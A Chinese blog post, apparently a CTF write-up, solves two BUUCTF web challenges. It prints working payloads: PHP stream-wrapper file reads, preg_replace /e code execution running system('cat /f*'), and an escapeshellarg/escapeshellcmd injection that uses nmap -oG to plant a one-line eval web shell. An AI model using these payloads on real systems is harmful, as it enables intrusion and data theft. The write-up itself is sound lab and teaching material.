buu--web做题(4)

已于 2024-07-19 00:35:11 修改
阅读量1k 收藏 21
点赞数 11
文章标签: ctf web buuctf
于 2024-07-19 00:34:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80472909/article/details/140531431
版权

目录

[BJDCTF2020]ZJCTF,不过如此

[BUUCTF 2018]Online Tool

[BJDCTF2020]ZJCTF,不过如此

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

第一个判断 直接使用 data 伪协议 绕过就行
?text=data://text/plain,I have a dream&file=


在使用 filter伪协议 包含一下 next.php 读取文件内容
?text=data://text/plain,I have a dream&file=php://filter/convert.base64-encode/resource=next.php

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

深入研究preg_replace与代码执行 - 先知社区

preg_replace()  使用了 /e 模式 , 第二个参数可以进行命令执行, 但这里第二个参数是固定了
 一种反向引用问题:
正则表达式 – 语法_w3cschool

反向引用

对一个正则表达式模式或部分模式 两边添加圆括号 将导致相关 匹配存储到一个临时缓冲区 中,所捕获的每个子匹配都按照在正则表达式模式中从左到右出现的顺序存储。缓冲区编号从 1 开始,最多可存储 99 个捕获的子表达式。每个缓冲区都可以使用 '\n' 访问,其中 n 为一个标识特定缓冲区的一位或两位十进制数。


\\1 ---> \1 第一个子匹配项 ,
( strtolower() 里面是双引号, 单引号都不行 ,  \1 就会就会捕获到对应的表达式  (getFlag()) ,
  在 /e 模式下就可以进行执行这个函数  )
payload:
/?.*={${getFlag()}}  ---> 可以执行 getFlag()  函数

php的非法传参问题 ,   " . " 会变成  " _ " 
使用 \S 代替  表示 "  匹配任何非空白字符  "

然后调用 这里面的 getFlag() 函数进行命令执行

    /next.php?\S*=${getFlag()}&cmd=system("cat /f*");

[BUUCTF 2018]Online Tool

 <?php

if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
    $_SERVER['REMOTE_ADDR'] = $_SERVER['HTTP_X_FORWARDED_FOR'];
}

if(!isset($_GET['host'])) {
    highlight_file(__FILE__);
} else {
    $host = $_GET['host'];
    $host = escapeshellarg($host);
    $host = escapeshellcmd($host);
    $sandbox = md5("glzjin". $_SERVER['REMOTE_ADDR']);
    echo 'you are in sandbox '.$sandbox;
    @mkdir($sandbox);
    chdir($sandbox);
    echo system("nmap -T5 -sT -Pn --host-timeout 2 -F ".$host);
}

里面的两个特殊的函数
https://www.cnblogs.com/darkcyan/p/17676088.html

escapeshellarg()

escapeshellcmd()

这两个函数按照这样的顺序使用会产生漏洞, 反过来就不会

escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数
功能 :escapeshellarg() 将给字符串增加一个单引号并且能引用或者转码任何已经存在的单引号,
这样以确保能够直接将一个字符串传入 shell 函数,shell 函数包含 exec(), system() 执行运算符(反引号)

escapeshellcmd — shell 元字符转义
功能:escapeshellcmd() 对字符串中可能会欺骗 shell 命令执行任意命令的字符进行转义。
此函数保证用户输入的数据在传送到 exec()system() 函数,或者 执行操作符 之前进行转义。

反斜线(\)会在以下字符之前插入:
&#;`|?~<>^()[]{}$, \x0A 和 \xFF。 *’ 和 “ 仅在不配对儿的时候被转义。
在 Windows 平台上,所有这些字符以及 % 和 ! 字符都会被空格代替。

nmap有一个参数-oG可以实现将命令和结果写到文件

所以我们可以控制自己的输入写入文件,这里我们可以写入一句话木马链接,也可以直接命令 cat flag

payload:

?host=' <?php echo `cat /flag`;?> -oG test.php '

?host=' <?php eval($_POST(1));?> -oG test.php '

查看 相应的路径
/6015389ed778aaa28f4d9a23e8ba0727/test.php
得到flag

pwfortune
关注
  • 11
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位赛-easywasm(WebAssembly逆向分析)"这个挑战中,参赛者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
05-26
在本题目中,我们面临的是一个关于WebAssembly(简称WASM)逆向分析的挑战,源自FlareOn5赛事的Web2.0关卡。WebAssembly是一种低级虚拟机指令集,它允许开发者以接近原生的速度运行用C、C++或Rust等语言编译的代码。...
buu--web做题(3)
pwfortune的博客
07-17 741
尝试随便输入一个参数, 发现报错有个 include() , 估计就是文件包含了。好像也可以 使用 \system 来绕过 (但我尝试的时候没成功, 没有回显)根据报错, 搜索一下可以发现是Smarty 模板。抓个包看看尝试伪造一下ip, 有没有什么变化。所以问题就是这里了, 看看再这里执行一下命令。尝试读一下当前文件, 依旧报错 ,有点奇怪。使用{if}{/if}标签执行命令。点击一下flag , 会先出ip。看一下环境里面, 也没有flag。emmmm, 没找到flag。好像没啥东西, 抓个包看看。
buu-WEB-不是文件上传
m0_52061428的博客
01-24 455
他将传入的数据中的" * "替换成了"\0\0\0",符合这一要求的只有我们构建的序列化语句,所以我们也要进行操作。大致就是这么运行的,helper.php中没有被运行的有view_files()和__destruct()先快速审计一下,发现其余两个文件都在包含helper.php,所以着重看helper.php。这题主要考验代码审计能力和对sql的熟悉程度,不过有一说一,题量确实大。这里让我联想到了反序列化。_destruct被触发时,view_file才会被调用,并且view。这是他的三个php文件。
Web-buu-你传你呢 题后总结
WRplayeR的博客
10-14 75
buu做题的总结 包括一些新手错误(我就是新手)
buu-web刷题
qq_46540840的博客
11-06 217
GKCTF2020复现 备赛刷题 CheckIN 首先源码 <title>Check_In</title> <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code =
Buu - [GKCTF 2021]easycms
2302_79839194的博客
05-22 256
这是一个chanzhiEPS搭建的网站,看到版本是7.7,去网上搜相关版本有没有漏洞,题目中提示了后台密码是5位的弱口令。可以选中首页的代码,这样的话不需要找目录了[ 每一种框架都可能存在自己的目录检索方式 ]这后面的数据一看像是base64编码后的数据,进行解码,发现是一个文件对应的绝对路径。尝试将这个路径改为/flag=>base64编码,然后执行下载得到文件,我在这里抓包修改下载链接,不知道为什么下载出来的不对。这里得到的是.zip文件,直接用010打开即可。
buu-[HITCON 2017]SSRFme
o3Ev的博客
08-11 296
buu-[HITCON 2017]SSRFme 182.xxx.xxx.xxx<?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; } echo $_SERVER["REM
BUU-MISC
qq_24033605的博客
04-16 712
BUU-MISC题解签到第二题二维码N种方法解决大白你竟然赶我走基础破解种图LSB文件中的秘密wiresharkrarqrzip伪加密ningen镜子里面的世界被嗅探的流量小明的保险箱爱因斯坦easycap另一个世界隐藏的钥匙flag假如给我三天光明神秘龙卷风后门查杀Holland宽带数据泄露来首歌吧数据包中的线索九连环面具下的flagwebshell后门 签到 flag贴着脸送给你呢,还能不收着,别说看不到哈。 第二题 一道基础的动态图拆分。 利用工具 里面的Frame Browser:帧浏览器模块,一帧
BUU-[网鼎杯 2020 朱雀组]phpweb
半文盲半疯癫重度手机爱好者,世界选社恐大赛第二名。
03-11 476
先抓个包瞅瞅看: 左边最后一行里func=date&p=Y-m-d+h%3A%3As+a 传递两个参数func和p 下面尝试读取一下index.php内容 <?php $disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd",
Buu-MRCTF
unexpectedthing的博客
10-27 204
文章目录Ez_bypass1Ez-pop你传你妈呢Pywebsite套娃EZauditEzpop_Reveng Ez_bypass1 打开环境,我们发现直接给了代码 整理过后: <?php $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5(
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
4. **避免import_request_variables()**:由于其固有的风险,尽可能避免使用此函数。 5. **使用预定义变量**:尽量使用预定义的变量(如`$_GET`、`$_POST`等)来访问HTTP请求数据,而不是直接使用全局变量。 在题目...
POSN:POSN-BUU的源代码
04-01
4. **多线程与并发**:考虑到定位服务可能需要处理来自多个传感器的数据,源代码可能包含了多线程编程,使用`std::thread`或者更高级的并发库如OpenMP来实现并行处理。 5. **数据结构与算法**:定位算法通常涉及...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
JVC AV-29L31彩电维修手册和图纸.rar
08-19
JVC AV-29L31彩电维修手册和图纸
树状数组:数据结构中的瑞士军刀
最新发布
08-19
数据结构是计算机科学中的一个基本概念,它指的是数据的组织、管理和存储方式,以及对数据的操作。数据结构使得数据的访问和修改更加高效和有序。常见的数据结构包括: 1. **数组**(Array):一种线性数据结构,可以存储相同类型的元素,并通过索引访问。 2. **链表**(Linked List):一种线性数据结构,由一系列节点组成,每个节点包含数据部分和指向下一个节点的指针。 3. **栈**(Stack):一种后进先出(LIFO, Last In First Out)的数据结构,只能在一端进行添加或删除操作。 4. **队列**(Queue):一种先进先出(FIFO, First In First Out)的数据结构,允许在一端添加元素,在另一端删除元素。 5. **哈希表**(Hash Table):通过键值对存储数据的数据结构,可以快速地通过键来访问数据。 6. **树**(Tree):一种层次结构的数据结构,每个节点有零个或多个子节点,通常用于表示具有层次关系的数据。 7. **图**(Graph):由顶点(节点)和边组成,可以表示复杂的关系和网络结构。 每种数据结构都有其
JVC AV-21H1E彩电电路原理图.rar
08-19
JVC AV-21H1E彩电电路原理图
基于uniapp+springboot的校园失物招领系统的设计与实现--pf.zip
08-19
互联网发展至今,无论是其理论还是技术都已经成熟,而且它广泛参与在社会中的方方面面。它让信息都可以通过网络传播,搭配信息管理工具可以很好地为人们提供服务。针对高校教师成果信息管理混乱,出错率高,信息安全性差,劳动强度大,费时费力等问题,采用校园失物招领系统可以有效管理,使信息管理能够更加科学和规范。 校园失物招领系统使用Java语言进行编码,使用Mysql创建数据表保存本系统产生的数据。系统可以提供信息显示和相应服务,其管理校园失物招领系统信息,查看校园失物招领系统信息,管理校园失物招领系统。 总之,校园失物招领系统集中管理信息,有着保密性强,效率高,存储空间大,成本低等诸多优点。它可以降低信息管理成本,实现信息管理计算机化。
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值